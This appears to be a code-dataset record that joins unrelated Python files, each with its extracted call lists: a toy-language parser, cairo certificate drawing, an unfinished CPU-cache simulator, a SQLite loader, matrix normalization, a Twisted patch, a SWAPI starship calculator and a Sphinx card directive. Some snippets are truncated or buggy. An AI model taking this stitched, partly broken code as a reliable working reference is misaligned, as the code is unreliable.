assert "Unexpected token: %s (%s)" % (token, token.__class__)
def handle_expression(self):
while True:
try:
self._debug('Handling expression')
token = self.next_token
self._debug("Consider %s", token.__class__)
except IndexError:
# didn't shift the token off yet so make sure the line num is accurate
raise exceptions.OutOfTokens(self.line_num + 1, 'During handle expression')
if isinstance(token, tokens.IdentifierToken) or \
isinstance(token, tokens.LiteralToken):
if self.handler_exists(token):
return self.handle_identifier()
else:
return self.handle_operator_expression()
elif isinstance(token, tokens.LineTerminatorToken):
self._debug("Delete this infernal line terminator")
self._inc_line()
self.shift_token()
return nodes.NopNode(self.line_num)
elif isinstance(token, tokens.RightCurlyBraceToken):
self._debug("Found }, beat it")
self.shift_token()
raise exceptions.EndContextExecution(self.line_num)
else:
raise exceptions.ParseError(self.line_num)
def handler_exists(self, token):
self._debug("* Checking if there is a handler for %s" % token)
method_name = 'handle_identifier_' + token.body
return hasattr(self, method_name)
def handle_identifier(self):
token = self.shift_token()
method_name = 'handle_identifier_' + token.body
method = getattr(self, method_name)
return method(token)
def handle_identifier_if(self, token):
self._debug("Handling IF")
condition = self.handle_operator_expression()
then_branch = nodes.Branch([])
else_branch = nodes.Branch([])
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.next_token.body not in ['else', 'end']:
self._debug("Checking next expression as part of THEN clause")
try:
then_branch.append(self.handle_expression())
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here "
"because we're in an if statement")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num,
"Unexpected end of file during if statement")
if isinstance(self.next_token, tokens.IdentifierToken) and \
self.next_token.body == 'else':
self.shift_token()
while not isinstance(self.next_token, tokens.IdentifierToken) or \
                    [t.body for t in self.tokens[0:2]] != ['end', 'if']:
self._debug(
"Checking next expression as part of ELSE clause")
try:
else_branch.append(self.handle_expression())
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here "
"because we're in an if statement")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num,
"Unexpected end of file during if statement")
end_token = self.shift_token()
if_token = self.shift_token()
self._debug("Then: %s, Else: %s, End If: %s %s",
then_branch, else_branch, end_token.body, if_token.body)
assert isinstance(end_token, tokens.IdentifierToken) and \
end_token.body == 'end'
assert isinstance(if_token, tokens.IdentifierToken) and \
if_token.body == 'if'
return nodes.IfNode(self.line_num, condition, then_branch, else_branch)
def handle_identifier_true(self, token):
self._debug("Encountered 'true'")
assert token.value.lower() == 'true'
return nodes.BooleanNode(self.line_num, True)
def handle_identifier_false(self, token):
self._debug("Encountered 'false'")
assert token.value.lower() == 'false'
return nodes.BooleanNode(self.line_num, False)
def handle_identifier_return(self, token):
self._debug("Handling return statement")
return_node = self.handle_operator_expression()
return nodes.ReturnNode(self.line_num, return_node)
def handle_identifier_while(self, token):
self._debug("Handling while loop")
condition = self.handle_operator_expression()
branch = nodes.Branch()
try:
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.next_token.body not in ['end']:
try:
branch.append(self.handle_expression())
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here "
"because we're in a while statement")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num, "end while expected")
end_token = self.shift_token()
while_token = self.shift_token()
assert isinstance(end_token, tokens.IdentifierToken) and \
end_token.body == 'end'
assert isinstance(while_token, tokens.IdentifierToken) and \
while_token.body == 'while'
return nodes.WhileNode(self.line_num, condition, branch)
def handle_identifier_for(self, token):
self._debug("Handling for loop")
token = self.shift_token()
if not isinstance(token, tokens.IdentifierToken):
raise exceptions.ParseError(self.line_num, "Expected a name, got %s" % token)
var_name = token.body
token = self.shift_token()
if not isinstance(token, tokens.IdentifierToken) or \
token.body != 'in':
raise exceptions.ParseError(self.line_num, "Expected 'in', got %s" % token)
iterable = self.handle_operator_expression()
self._debug("The iterable is %s" % iterable)
branch = nodes.Branch()
try:
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.next_token.body not in ['end']:
self._debug("For Loop: Consider %s" % self.next_token)
try:
branch.append(self.handle_expression())
self._debug(
"Just handled an expression."
"Branch looks like %s now" % branch)
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here"
"because we're in a for loop")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num, "end for expected")
end_token = self.shift_token()
for_token = self.shift_token()
self._debug("End token: %s, For token: %s" % (end_token, for_token))
assert isinstance(end_token, tokens.IdentifierToken) and \
end_token.body == 'end'
assert isinstance(for_token, tokens.IdentifierToken) and \
for_token.body == 'for'
self._debug("Returning for loop node")
return nodes.ForNode(self.line_num, var_name, iterable, branch)
|
[
"nodes.BooleanNode",
"nodes.ReturnNode",
"logging.error",
"logging.debug",
"nodes.ListNode",
"nodes.DictionaryNode",
"nodes.VariableNode",
"nodes.Branch",
"nodes.IfNode",
"nodes.NumberNode",
"nodes.InvocationNode",
"nodes.NopNode",
"nodes.ForNode",
"nodes.FunctionNode",
"nodes.WhileNode",
"nodes.StringNode"
] |
[((240, 333), 'logging.debug', 'logging.debug', (["('<Line %d, Token %d> ' % (self.line_num, self.token_counter) + text)", '*args'], {}), "('<Line %d, Token %d> ' % (self.line_num, self.token_counter) +\n text, *args)\n", (253, 333), False, 'import logging\n'), ((1370, 1386), 'nodes.Branch', 'nodes.Branch', (['[]'], {}), '([])\n', (1382, 1386), False, 'import nodes\n'), ((3411, 3425), 'nodes.Branch', 'nodes.Branch', ([], {}), '()\n', (3423, 3425), False, 'import nodes\n'), ((3662, 3738), 'nodes.FunctionNode', 'nodes.FunctionNode', (['self.line_num', 'self.context_class', 'sig_names', 'new_branch'], {}), '(self.line_num, self.context_class, sig_names, new_branch)\n', (3680, 3738), False, 'import nodes\n'), ((5482, 5546), 'nodes.InvocationNode', 'nodes.InvocationNode', (['self.line_num', 'name_token.body', 'arg_tokens'], {}), '(self.line_num, name_token.body, arg_tokens)\n', (5502, 5546), False, 'import nodes\n'), ((5694, 5710), 'nodes.ListNode', 'nodes.ListNode', ([], {}), '()\n', (5708, 5710), False, 'import nodes\n'), ((6652, 6687), 'nodes.DictionaryNode', 'nodes.DictionaryNode', (['self.line_num'], {}), '(self.line_num)\n', (6672, 6687), False, 'import nodes\n'), ((20296, 20312), 'nodes.Branch', 'nodes.Branch', (['[]'], {}), '([])\n', (20308, 20312), False, 'import nodes\n'), ((20335, 20351), 'nodes.Branch', 'nodes.Branch', (['[]'], {}), '([])\n', (20347, 20351), False, 'import nodes\n'), ((22424, 22488), 'nodes.IfNode', 'nodes.IfNode', (['self.line_num', 'condition', 'then_branch', 'else_branch'], {}), '(self.line_num, condition, then_branch, else_branch)\n', (22436, 22488), False, 'import nodes\n'), ((22637, 22675), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(True)'], {}), '(self.line_num, True)\n', (22654, 22675), False, 'import nodes\n'), ((22827, 22866), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(False)'], {}), '(self.line_num, False)\n', (22844, 22866), False, 'import nodes\n'), ((23035, 23079), 'nodes.ReturnNode', 'nodes.ReturnNode', (['self.line_num', 'return_node'], {}), '(self.line_num, return_node)\n', (23051, 23079), False, 'import nodes\n'), ((23241, 23255), 'nodes.Branch', 'nodes.Branch', ([], {}), '()\n', (23253, 23255), False, 'import nodes\n'), ((24187, 24236), 'nodes.WhileNode', 'nodes.WhileNode', (['self.line_num', 'condition', 'branch'], {}), '(self.line_num, condition, branch)\n', (24202, 24236), False, 'import nodes\n'), ((24883, 24897), 'nodes.Branch', 'nodes.Branch', ([], {}), '()\n', (24895, 24897), False, 'import nodes\n'), ((26154, 26210), 'nodes.ForNode', 'nodes.ForNode', (['self.line_num', 'var_name', 'iterable', 'branch'], {}), '(self.line_num, var_name, iterable, branch)\n', (26167, 26210), False, 'import nodes\n'), ((4065, 4119), 'nodes.VariableNode', 'nodes.VariableNode', (['self.line_num', 'variable_token.body'], {}), '(self.line_num, variable_token.body)\n', (4083, 4119), False, 'import nodes\n'), ((17047, 17116), 'logging.error', 'logging.error', (['"""Tree stack length is not 1. Contents: %s"""', 'tree_stack'], {}), "('Tree stack length is not 1. Contents: %s', tree_stack)\n", (17060, 17116), False, 'import logging\n'), ((12050, 12068), 'logging.error', 'logging.error', (['msg'], {}), '(msg)\n', (12063, 12068), False, 'import logging\n'), ((18095, 18140), 'nodes.VariableNode', 'nodes.VariableNode', (['self.line_num', 'token.body'], {}), '(self.line_num, token.body)\n', (18113, 18140), False, 'import nodes\n'), ((2140, 2169), 'logging.error', 'logging.error', (['"""Unexpected }"""'], {}), "('Unexpected }')\n", (2153, 2169), False, 'import logging\n'), ((17868, 17906), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(True)'], {}), '(self.line_num, True)\n', (17885, 17906), False, 'import nodes\n'), ((18219, 18262), 'nodes.NumberNode', 'nodes.NumberNode', (['self.line_num', 'token.body'], {}), '(self.line_num, token.body)\n', (18235, 18262), False, 'import nodes\n'), ((19414, 19442), 'nodes.NopNode', 'nodes.NopNode', (['self.line_num'], {}), '(self.line_num)\n', (19427, 19442), False, 'import nodes\n'), ((20708, 20785), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } here because we\'re in an if statement"""'], {}), '("There shouldn\'t be a } here because we\'re in an if statement")\n', (20721, 20785), False, 'import logging\n'), ((17970, 18009), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(False)'], {}), '(self.line_num, False)\n', (17987, 18009), False, 'import nodes\n'), ((18341, 18384), 'nodes.StringNode', 'nodes.StringNode', (['self.line_num', 'token.body'], {}), '(self.line_num, token.body)\n', (18357, 18384), False, 'import nodes\n'), ((21612, 21689), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } here because we\'re in an if statement"""'], {}), '("There shouldn\'t be a } here because we\'re in an if statement")\n', (21625, 21689), False, 'import logging\n'), ((23561, 23640), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } here because we\'re in a while statement"""'], {}), '("There shouldn\'t be a } here because we\'re in a while statement")\n', (23574, 23640), False, 'import logging\n'), ((25422, 25493), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } herebecause we\'re in a for loop"""'], {}), '("There shouldn\'t be a } herebecause we\'re in a for loop")\n', (25435, 25493), False, 'import logging\n'), ((16464, 16531), 'logging.error', 'logging.error', (['"""Encountered IndexError. Tree stack: %s"""', 'tree_stack'], {}), "('Encountered IndexError. Tree stack: %s', tree_stack)\n", (16477, 16531), False, 'import logging\n')]
|
import Colour
import Font
import OutputFunctions
from Definitions import *
from graphics.cairo import Draw
from math import ceil
from graphics.cairo.Draw import FillStyle, TextStyle
class Paper:
def __init__(self, width=63*mm, height=39*mm, marker=None):
self.width = width
self.height = height
self.canvas = Draw.Canvas((0, 0), width, height)
if isinstance(marker, Draw.Canvas):
self.canvas.draw(marker, (2*mm, height - 2*mm))
elif marker is not None:
Draw.text(self.canvas, (0, height), marker, TextStyle(Font.very_small, Colour.grey, 'bottom', 'left'))
def split_into_parts(self, max_width, max_height):
def how_many_fit(large, small):
return ceil(large / small)
n_portrait_pages = how_many_fit(self.width, max_width) * how_many_fit(self.height, max_height)
n_landscape_pages = how_many_fit(self.width, max_height) * how_many_fit(self.height, max_width)
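        # Pick whichever page orientation splits the map into the fewest parts.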
if n_landscape_pages < n_portrait_pages:
split_in_parts_horizontally = how_many_fit(self.width, max_height)
split_in_parts_vertically = how_many_fit(self.height, max_width)
else:
split_in_parts_horizontally = how_many_fit(self.width, max_width)
split_in_parts_vertically = how_many_fit(self.height, max_height)
width_map_part = self.width / split_in_parts_horizontally
height_map_part = self.height / split_in_parts_vertically
for column in range(split_in_parts_horizontally):
for row in range(split_in_parts_vertically):
paper_part = Paper(width_map_part, height_map_part)
paper_part.canvas.draw(self.canvas, (-column * width_map_part, -row * height_map_part))
yield paper_part
class Certificate(Paper):
def __init__(self, colour, price=None, name=None, icon=None, marker=None):
super().__init__()
self.colour = colour
c = self.canvas
Draw.rectangle(c, (0, 0), self.width, self.height, FillStyle(colour.faded()))
Draw.rectangle(c, (3*mm, 0), 13*mm, self.height, FillStyle(colour))
if isinstance(marker, Draw.Canvas):
self.canvas.draw(marker, (0, self.height - 3*mm))
elif marker is not None:
Draw.text(self.canvas, (0, self.height), marker, TextStyle(Font.very_small, Colour.grey, 'bottom', 'left'))
if name:
y = self.height/2 if price else 14*mm
OutputFunctions.draw_centered_lines(name, Font.certificate_name, c,
x_c=(self.width + 16*mm)/2, y=y,
width=self.width - 16*mm - 6*mm)
if price:
Draw.text(c, (self.width - 3*mm, 2.8*mm), price,
TextStyle(Font.price, Colour.black, 'top', 'right'))
if icon:
Draw.load_image(c, icon, (9.5*mm, 7*mm), width=10*mm, height=10*mm)
|
[
"graphics.cairo.Draw.FillStyle",
"math.ceil",
"graphics.cairo.Draw.load_image",
"OutputFunctions.draw_centered_lines",
"graphics.cairo.Draw.TextStyle",
"graphics.cairo.Draw.Canvas"
] |
[((340, 374), 'graphics.cairo.Draw.Canvas', 'Draw.Canvas', (['(0, 0)', 'width', 'height'], {}), '((0, 0), width, height)\n', (351, 374), False, 'from graphics.cairo import Draw\n'), ((743, 762), 'math.ceil', 'ceil', (['(large / small)'], {}), '(large / small)\n', (747, 762), False, 'from math import ceil\n'), ((2133, 2150), 'graphics.cairo.Draw.FillStyle', 'FillStyle', (['colour'], {}), '(colour)\n', (2142, 2150), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n'), ((2492, 2638), 'OutputFunctions.draw_centered_lines', 'OutputFunctions.draw_centered_lines', (['name', 'Font.certificate_name', 'c'], {'x_c': '((self.width + 16 * mm) / 2)', 'y': 'y', 'width': '(self.width - 16 * mm - 6 * mm)'}), '(name, Font.certificate_name, c, x_c=(\n self.width + 16 * mm) / 2, y=y, width=self.width - 16 * mm - 6 * mm)\n', (2527, 2638), False, 'import OutputFunctions\n'), ((2907, 2982), 'graphics.cairo.Draw.load_image', 'Draw.load_image', (['c', 'icon', '(9.5 * mm, 7 * mm)'], {'width': '(10 * mm)', 'height': '(10 * mm)'}), '(c, icon, (9.5 * mm, 7 * mm), width=10 * mm, height=10 * mm)\n', (2922, 2982), False, 'from graphics.cairo import Draw\n'), ((2824, 2875), 'graphics.cairo.Draw.TextStyle', 'TextStyle', (['Font.price', 'Colour.black', '"""top"""', '"""right"""'], {}), "(Font.price, Colour.black, 'top', 'right')\n", (2833, 2875), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n'), ((569, 626), 'graphics.cairo.Draw.TextStyle', 'TextStyle', (['Font.very_small', 'Colour.grey', '"""bottom"""', '"""left"""'], {}), "(Font.very_small, Colour.grey, 'bottom', 'left')\n", (578, 626), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n'), ((2353, 2410), 'graphics.cairo.Draw.TextStyle', 'TextStyle', (['Font.very_small', 'Colour.grey', '"""bottom"""', '"""left"""'], {}), "(Font.very_small, Colour.grey, 'bottom', 'left')\n", (2362, 2410), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n')]
|
import cacheL1
import cacheL1Controller
import clock
import threading
import random
from time import sleep
class core:
isa = ['read', 'write', 'calc']
state = 'awake'
class processor(threading.Thread):
countInstructions = 1
processTime = 1
def __init__(self, coreID, chipID, clock, cacheL1, cacheL1Controller, update):
self.coreID = coreID
self.chipID = chipID
self.clock = clock
self.cacheL1 = cacheL1
self.cacheL1Controller = cacheL1Controller
self.standBy = threading.Condition()
self.cacheL1Controller.addPause(self.standBy)
self.update = update
threading.Thread.__init__(self)
def process(self):
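            # Simulate the instruction's processing latency, then report the finished work through the update callback.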
sleep(self.processTime)
self.update(self.coreID, 'rates')
def run(self):
while(True):
if(self.clock.play):
instruction = core.generateInstruction()
self.countInstructions += 1
command = "# Clicle: {} Instruction: {} ->\n {} ".format(self.clock.countCicle, self.countInstructions, instruction)
if (instruction in ['read', 'write']):
mainMemAdd = random.randrange(16)
command += "Address: {} CoreId: {} ChipId: {}".format(mainMemAdd, self.coreID, self.chipID)
self.update(self.coreID, 'log', log = command)
if(instruction == 'read'):
self.cacheL1Controller.rea
# Core Constructor
def __init__(self, coreID, chipID, clock, update):
self.coreID = coreID
self.chipID = chipID
self.clock = clock
self.update = update
# Start
def start(self):
self.processor.start()
# Get instruction
@staticmethod
def generateInstruction():
# Special Distribution Function
return core.isa[random.randrange(3)]
|
[
"threading.Thread.__init__",
"threading.Condition",
"random.randrange",
"time.sleep"
] |
[((573, 594), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (592, 594), False, 'import threading\n'), ((698, 729), 'threading.Thread.__init__', 'threading.Thread.__init__', (['self'], {}), '(self)\n', (723, 729), False, 'import threading\n'), ((770, 793), 'time.sleep', 'sleep', (['self.processTime'], {}), '(self.processTime)\n', (775, 793), False, 'from time import sleep\n'), ((1980, 1999), 'random.randrange', 'random.randrange', (['(3)'], {}), '(3)\n', (1996, 1999), False, 'import random\n'), ((1268, 1288), 'random.randrange', 'random.randrange', (['(16)'], {}), '(16)\n', (1284, 1288), False, 'import random\n')]
|
import os
import sqlite3
import csv
import pandas as pd
import numpy as np
from .pybash import get_file_info
def connect_to_db(path):
"""
Interact with a SQLite database
Parameters
----------
path: str
Location of the SQLite database
Returns
-------
conn: Connector
The SQLite connection object
curs: Cursor
The SQLite cursor object
Usage
-----
conn, curs = connect_to_db("data/raw/foo.db")
"""
try:
if os.path.exists(path):
print("Connecting to Existing DB")
conn = sqlite3.connect(path)
else:
print("Initialising new SQLite DB")
conn = sqlite3.connect(path)
curs = conn.cursor()
except:
print("An error occured. Please check the file path")
return conn, curs
def print_table_names(path_to_db):
"""
Print and return the names of tables in a SQLite database
"""
conn, curs = connect_to_db(path_to_db)
result = curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
print(result)
return result
def load_file_to_db(path_to_file, path_to_db, table_name, delim):
"""
Load a text file of any size into a SQLite database
Parameters
----------
path_to_file: str
Location of the text file
path_to_db: str
Location of the SQLite db
table_name: str
Name of the table to be created in the database
delim: str
The delimiter for the text file
Returns
-------
None
"""
conn, curs = connect_to_db(path_to_db)
print("The database at {} contains the following tables.".format(path_to_db))
print(curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall())
if os.path.exists(path_to_file):
size_ = get_file_info(path_to_file).get('size')
rows_ = get_file_info(path_to_file).get('rows')
try:
if size_ < 250:
print("{} is a small file. Importing directly.".format(path_to_file))
df_ = pd.read_csv(
path_to_file,
sep=delim,
low_memory=False,
error_bad_lines=False,
quoting=csv.QUOTE_NONE
)
df_.to_sql(
name=table_name,
con=conn,
index=False,
if_exists='append'
)
print("Done.")
else:
print("{} is large. Importing in chunks.".format(path_to_file))
csize = int(np.ceil(rows_/10))
chunks = pd.read_csv(
path_to_file,
sep=delim,
chunksize=csize,
error_bad_lines=False,
low_memory=False,
quoting=csv.QUOTE_NONE
)
for c in chunks:
c.to_sql(
name=table_name,
con=conn,
index=False,
if_exists='append'
)
print("Done")
except:
print("An error occurred while reading the file.")
else:
print("File not found at {}, please check the path".format(path_to_file))
return None
|
[
"pandas.read_csv",
"sqlite3.connect",
"os.path.exists",
"numpy.ceil"
] |
[((1773, 1801), 'os.path.exists', 'os.path.exists', (['path_to_file'], {}), '(path_to_file)\n', (1787, 1801), False, 'import os\n'), ((486, 506), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (500, 506), False, 'import os\n'), ((574, 595), 'sqlite3.connect', 'sqlite3.connect', (['path'], {}), '(path)\n', (589, 595), False, 'import sqlite3\n'), ((677, 698), 'sqlite3.connect', 'sqlite3.connect', (['path'], {}), '(path)\n', (692, 698), False, 'import sqlite3\n'), ((2064, 2170), 'pandas.read_csv', 'pd.read_csv', (['path_to_file'], {'sep': 'delim', 'low_memory': '(False)', 'error_bad_lines': '(False)', 'quoting': 'csv.QUOTE_NONE'}), '(path_to_file, sep=delim, low_memory=False, error_bad_lines=\n False, quoting=csv.QUOTE_NONE)\n', (2075, 2170), True, 'import pandas as pd\n'), ((2679, 2801), 'pandas.read_csv', 'pd.read_csv', (['path_to_file'], {'sep': 'delim', 'chunksize': 'csize', 'error_bad_lines': '(False)', 'low_memory': '(False)', 'quoting': 'csv.QUOTE_NONE'}), '(path_to_file, sep=delim, chunksize=csize, error_bad_lines=False,\n low_memory=False, quoting=csv.QUOTE_NONE)\n', (2690, 2801), True, 'import pandas as pd\n'), ((2635, 2654), 'numpy.ceil', 'np.ceil', (['(rows_ / 10)'], {}), '(rows_ / 10)\n', (2642, 2654), True, 'import numpy as np\n')]
|
import json
from collections import namedtuple
def _json_object_hook(d):
return namedtuple('X', d.keys())(*d.values())
def json2obj(data):
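    # Round-trip through a JSON string so object_hook rebuilds every nested dict as a namedtuple.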
a = json.dumps(data)
return json.loads(a, object_hook=_json_object_hook)
|
[
"json.loads",
"json.dumps"
] |
[((149, 165), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (159, 165), False, 'import json\n'), ((175, 219), 'json.loads', 'json.loads', (['a'], {'object_hook': '_json_object_hook'}), '(a, object_hook=_json_object_hook)\n', (185, 219), False, 'import json\n')]
|
"""
script to matrix normalization
"""
from functools import reduce
import math as m
import numpy as np
def minmax_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: min max normalized column of matrix data
"""
if min(x) == max(x):
return np.ones(x.shape)
if type == 'cost':
return (max(x) - x) / (max(x) - min(x))
return (x - min(x)) / (max(x) - min(x))
def max_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: max normalized column of matrix data
"""
if type == 'cost':
return 1 - x/max(x)
return x / max(x)
def sum_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: sum normalized column of matrix data
"""
if type == 'cost':
return (1/x) / sum(1/x)
return x / sum(x)
def vector_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: vector normalized column of matrix data
"""
if type == 'cost':
return 1 - (x / np.sqrt(sum(x ** 2)))
return x / np.sqrt(sum(x ** 2))
def logaritmic_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: logarithmic normalized column of matrix data
"""
prod = reduce(lambda a, b: a*b, x)
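    # Product of all column entries; log(prod) is the common denominator of the normalization.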
if type == 'cost':
return (1 - (np.log(x) / m.log(prod))) / (len(x) - 1)
return np.log(x) / m.log(prod)
def normalize(matrix, types, method, precision=2):
"""
:param matrix: decision matrix
:param types: types of normalization for columns
:param method: method of normalization
:param precision: precision
:return: normalized matrix
"""
if matrix.shape[1] != len(types):
        print('Sizes do not match')
normalized_matrix = matrix.astype('float')
    for i in range(len(types)):
        normalized_matrix[:, i] = np.round(method(matrix[:, i], types[i]), precision)
return normalized_matrix
|
[
"functools.reduce",
"numpy.log",
"numpy.ones",
"math.log"
] |
[((1453, 1482), 'functools.reduce', 'reduce', (['(lambda a, b: a * b)', 'x'], {}), '(lambda a, b: a * b, x)\n', (1459, 1482), False, 'from functools import reduce\n'), ((328, 344), 'numpy.ones', 'np.ones', (['x.shape'], {}), '(x.shape)\n', (335, 344), True, 'import numpy as np\n'), ((1577, 1586), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (1583, 1586), True, 'import numpy as np\n'), ((1589, 1600), 'math.log', 'm.log', (['prod'], {}), '(prod)\n', (1594, 1600), True, 'import math as m\n'), ((1525, 1534), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (1531, 1534), True, 'import numpy as np\n'), ((1537, 1548), 'math.log', 'm.log', (['prod'], {}), '(prod)\n', (1542, 1548), True, 'import math as m\n')]
|
"""
Fix from Twisted r23970
"""
from twisted.internet.task import deferLater
from twisted.protocols.loopback import _loopbackAsyncBody
def _loopbackAsyncContinue(ignored, server, serverToClient, client, clientToServer):
# Clear the Deferred from each message queue, since it has already fired
# and cannot be used again.
clientToServer._notificationDeferred = serverToClient._notificationDeferred = None
# Schedule some more byte-pushing to happen. This isn't done
# synchronously because no actual transport can re-enter dataReceived as
# a result of calling write, and doing this synchronously could result
# in that.
from twisted.internet import reactor
return deferLater(
reactor, 0,
_loopbackAsyncBody, server, serverToClient, client, clientToServer)
def install():
from twisted.protocols import loopback
loopback._loopbackAsyncContinue = _loopbackAsyncContinue
|
[
"twisted.internet.task.deferLater"
] |
[((707, 801), 'twisted.internet.task.deferLater', 'deferLater', (['reactor', '(0)', '_loopbackAsyncBody', 'server', 'serverToClient', 'client', 'clientToServer'], {}), '(reactor, 0, _loopbackAsyncBody, server, serverToClient, client,\n clientToServer)\n', (717, 801), False, 'from twisted.internet.task import deferLater\n')]
|
# Library used to return the content of a URL
from urllib.request import Request, urlopen
# Library to decode text to JSON
import json
class SW_stops_amount:
def __init__(self):
pass
# Decodes the consumables
def calc(self, strConsumables):
intHOURS_IN_YEAR = 8760
intHOURS_IN_MONTH = 730
intHOURS_IN_WEEK = 168
intHOURS_IN_DAY = 24
# Gets the number part of the string
strValue = ''
for s in strConsumables.split():
if s.isdigit():
strValue += s
intNumber = int(strValue)
# Interprets the text part in consumables
if 'day' in strConsumables:
return intNumber * intHOURS_IN_DAY
if 'week' in strConsumables:
return intNumber * intHOURS_IN_WEEK
if 'month' in strConsumables:
return intNumber * intHOURS_IN_MONTH
if 'year' in strConsumables:
return intNumber * intHOURS_IN_YEAR
def get_amount(self, intDistance, strConsumables, strMGLT):
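        # Stops needed = distance / range per resupply, where range = endurance (hours) * speed (MGLT per hour).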
return int(intDistance / (self.calc(strConsumables) * int(strMGLT)))
# Prints the amount of stops given the ship and distance
def analyze_ship(self, ship, intDistance):
# Calculates the amount of stops
strName = ship['name']
strConsumables = ship['consumables']
strMGLT = ship['MGLT']
# Can't calculate when certain values are missing
if strConsumables != 'unknown' and strMGLT != 'unknown':
intAmountOfStops = self.get_amount(intDistance, strConsumables, strMGLT)
print('Ship: "{}", Amount of stops: {}'.format(strName, intAmountOfStops))
else:
print('Ship: "{}", Consumables and/or MGLT are unknown.'.format(strName))
def run(self):
# Header
print('Amount of Stops Calculator for SW Ships')
print()
# Asks the user for a value
bAskingForInput = True
while bAskingForInput:
try:
print('How far are you heading? Insert a numerical value for a distance in MGLT.')
strInput = input()
intDistance = int(strInput)
bAskingForInput = False
except:
print('The inserted value "{}" is invalid as a number. Try again.'.format(strInput))
print()
strURL_SWAPI_STARSHIPS = 'https://swapi.co/api/starships/'
print('Downloading data from {}...'.format(strURL_SWAPI_STARSHIPS))
print()
# Controls how many pages should be read
        bThereIsMoreData = True
intAmountOfShips = 0
while bThereIsMoreData:
# Gets the starships and their data
req = Request(strURL_SWAPI_STARSHIPS, headers={'User-Agent': 'Mozilla/5.0'})
content = urlopen(req).read()
data = json.loads(content.decode())
# Does the calc for each starship
for ship in data['results']:
intAmountOfShips += 1
self.analyze_ship(ship, intDistance)
strURL_SWAPI_STARSHIPS = data['next']
            bThereIsMoreData = strURL_SWAPI_STARSHIPS is not None
print()
input('{} ships in total. Hit ENTER to finish.'.format(intAmountOfShips))
App = SW_stops_amount()
if __name__ == '__main__':
App.run()
|
[
"urllib.request.Request",
"urllib.request.urlopen"
] |
[((2826, 2896), 'urllib.request.Request', 'Request', (['strURL_SWAPI_STARSHIPS'], {'headers': "{'User-Agent': 'Mozilla/5.0'}"}), "(strURL_SWAPI_STARSHIPS, headers={'User-Agent': 'Mozilla/5.0'})\n", (2833, 2896), False, 'from urllib.request import Request, urlopen\n'), ((2920, 2932), 'urllib.request.urlopen', 'urlopen', (['req'], {}), '(req)\n', (2927, 2932), False, 'from urllib.request import Request, urlopen\n')]
|
import re
from typing import List, NamedTuple, Optional, Tuple
from docutils import nodes
from docutils.parsers.rst import directives
from docutils.statemachine import StringList
from sphinx import addnodes
from sphinx.application import Sphinx
from sphinx.util.docutils import SphinxDirective
from sphinx.util.logging import getLogger
from .shared import (
WARNING_TYPE,
PassthroughTextElement,
create_component,
is_component,
make_choice,
margin_option,
text_align,
)
LOGGER = getLogger(__name__)
DIRECTIVE_NAME_CARD = "card"
DIRECTIVE_NAME_CAROUSEL = "card-carousel"
REGEX_HEADER = re.compile(r"^\^{3,}\s*$")
REGEX_FOOTER = re.compile(r"^\+{3,}\s*$")
def setup_cards(app: Sphinx) -> None:
"""Setup the card components."""
app.add_directive(DIRECTIVE_NAME_CARD, CardDirective)
app.add_directive(DIRECTIVE_NAME_CAROUSEL, CardCarouselDirective)
class CardContent(NamedTuple):
"""Split card into header (optional), body, footer (optional).
(offset, content)
"""
body: Tuple[int, StringList]
header: Optional[Tuple[int, StringList]] = None
footer: Optional[Tuple[int, StringList]] = None
class CardDirective(SphinxDirective):
"""A card component."""
has_content = True
required_arguments = 0
optional_arguments = 1 # card title
final_argument_whitespace = True
option_spec = {
"width": make_choice(["auto", "25%", "50%", "75%", "100%"]),
"margin": margin_option,
"text-align": text_align,
"img-top": directives.uri,
"img-bottom": directives.uri,
"img-background": directives.uri,
"link": directives.uri,
"link-type": make_choice(["url", "any", "ref", "doc"]),
"shadow": make_choice(["none", "sm", "md", "lg"]),
"class-card": directives.class_option,
"class-header": directives.class_option,
"class-body": directives.class_option,
"class-title": directives.class_option,
"class-footer": directives.class_option,
}
def run(self) -> List[nodes.Node]:
return [self.create_card(self, self.arguments, self.options)]
@classmethod
def create_card(
cls, inst: SphinxDirective, arguments: Optional[list], options: dict
) -> nodes.Node:
"""Run the directive."""
# TODO better degradation for latex
card_classes = ["sd-card", "sd-sphinx-override"]
if "width" in options:
card_classes += [f'sd-w-{options["width"].rstrip("%")}']
card_classes += options.get("margin", ["sd-mb-3"])
